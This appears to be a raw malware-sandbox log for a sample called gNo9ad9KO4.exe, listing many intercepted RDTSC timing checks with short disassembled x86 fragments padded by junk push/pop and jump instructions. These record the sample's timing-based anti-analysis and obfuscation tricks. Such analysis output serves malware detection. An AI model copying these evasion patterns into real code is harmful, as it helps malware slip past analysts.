                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41A6A9 second address: 41A6BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41A6BD second address: 41A6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41A6C3 second address: 41A6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41A6D6 second address: 41A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4688C929DCh 0x0000000b jno 00007F4688C929D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41AAF1 second address: 41AAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41B71F second address: 41B72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F4688C929D6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41E331 second address: 41E33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 44076B second address: 44076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45955F second address: 459565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 459807 second address: 45980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45980C second address: 45981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F4688C1B766h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45981E second address: 459822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 459970 second address: 459978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 459978 second address: 45997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45997C second address: 4599A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 jng 00007F4688C1B766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4688C1B770h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jc 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 4599A7 second address: 4599B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 459E99 second address: 459EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 459EA1 second address: 459EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A00F second address: 45A013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A013 second address: 45A023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A023 second address: 45A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A027 second address: 45A04D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jo 00007F4688C929E2h 0x00000010 jg 00007F4688C929D6h 0x00000016 jo 00007F4688C929D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 je 00007F4688C929D6h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A04D second address: 45A051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45A051 second address: 45A057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 45BC55 second address: 45BC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4688C1B771h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 461552 second address: 461557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 461557 second address: 46156D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4688C1B768h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007F4688C1B76Eh 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 46156D second address: 46157C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 46157C second address: 4615A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 462D69 second address: 462D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5450019 second address: 545001F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 545001F second address: 54500C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 jmp 00007F4688C929DBh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4688C929E4h 0x0000001f xor ch, FFFFFFF8h 0x00000022 jmp 00007F4688C929DBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F4688C929E8h 0x0000002e adc cl, 00000058h 0x00000031 jmp 00007F4688C929DBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d call 00007F4688C929E2h 0x00000042 pop esi 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430E3F second address: 5430E94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, F4DDh 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B76Ah 0x00000013 add eax, 6966C738h 0x00000019 jmp 00007F4688C1B76Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F4688C1B779h 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4688C1B76Dh 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430E94 second address: 5430EC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C929DEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430EC0 second address: 5430EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430EC4 second address: 5430ECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470F4E second address: 5470F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5410144 second address: 5410185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 24B112F2h 0x00000008 mov dh, 6Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 mov bl, 48h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E2h 0x0000001e xor ax, 4138h 0x00000023 jmp 00007F4688C929DBh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, bx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C3F second address: 5430C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C45 second address: 5430C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C49 second address: 5430C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C1B76Eh 0x00000010 sub si, 1D28h 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C7B second address: 5430C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C7F second address: 5430C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C83 second address: 5430C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C89 second address: 5430C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Fh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430C9C second address: 5430CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C929E5h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F4688C929DEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430CD1 second address: 5430CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 543087A second address: 54308BE instructions: 0x00000000 rdtsc 0x00000002 mov ch, C0h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4688C929E5h 0x0000000c and ax, 9836h 0x00000011 jmp 00007F4688C929E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4688C929DDh 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430776 second address: 543078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430569 second address: 54305BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f mov dx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E5h 0x0000001e xor ecx, 31D1AE16h 0x00000024 jmp 00007F4688C929E1h 0x00000029 popfd 0x0000002a mov cx, 0087h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54305BA second address: 54305C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54305C0 second address: 54305C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54305C4 second address: 54305D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54305D2 second address: 54305DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 08A85249h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440188 second address: 54401BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b sub ah, FFFFFFCEh 0x0000000e jmp 00007F4688C1B779h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54401BF second address: 54401C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, AAh 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54401C6 second address: 544023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B771h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4688C1B771h 0x0000000f adc cx, 0D66h 0x00000014 jmp 00007F4688C1B771h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B76Fh 0x0000002a sbb al, FFFFFF9Eh 0x0000002d jmp 00007F4688C1B779h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470E4B second address: 5470E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4688C929E6h 0x00000011 add cx, 5F78h 0x00000016 jmp 00007F4688C929DBh 0x0000001b popfd 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470E8C second address: 5470E9B instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470E9B second address: 5470EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470EA1 second address: 5470EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470EA7 second address: 5470EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470EAB second address: 5470EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 545037F second address: 5450457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 jmp 00007F4688C929E3h 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushfd 0x0000001b jmp 00007F4688C929DDh 0x00000020 sub esi, 5CA0D0C6h 0x00000026 jmp 00007F4688C929E1h 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f call 00007F4688C929E7h 0x00000034 mov ecx, 79290B5Fh 0x00000039 pop esi 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F4688C929DEh 0x00000041 mov ebp, esp 0x00000043 jmp 00007F4688C929E0h 0x00000048 mov eax, dword ptr [ebp+08h] 0x0000004b jmp 00007F4688C929E0h 0x00000050 and dword ptr [eax], 00000000h 0x00000053 jmp 00007F4688C929E0h 0x00000058 and dword ptr [eax+04h], 00000000h 0x0000005c pushad 0x0000005d mov ebx, eax 0x0000005f mov ch, 4Eh 0x00000061 popad 0x00000062 pop ebp 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5450457 second address: 545045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 545045B second address: 5450490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F4688C929E8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54306D6 second address: 54306DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54306DC second address: 54306E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 54306E0 second address: 5430710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F4688C1B76Bh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5430710 second address: 5430716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440E68 second address: 5440F12 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4688C1B779h 0x00000008 adc cx, 3CD6h 0x0000000d jmp 00007F4688C1B771h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov di, cx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b jmp 00007F4688C1B778h 0x00000020 push eax 0x00000021 pushfd 0x00000022 jmp 00007F4688C1B771h 0x00000027 adc ah, FFFFFF96h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F4688C1B76Ch 0x00000039 movzx ecx, bx 0x0000003c popad 0x0000003d xchg eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F4688C1B778h 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5440F12 second address: 5440F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E5h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 545020B second address: 545021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 545021C second address: 5450251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, 1F63h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4688C929E1h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470661 second address: 5470670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470670 second address: 5470676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 5470676 second address: 547068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop ebx 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 rdtsc
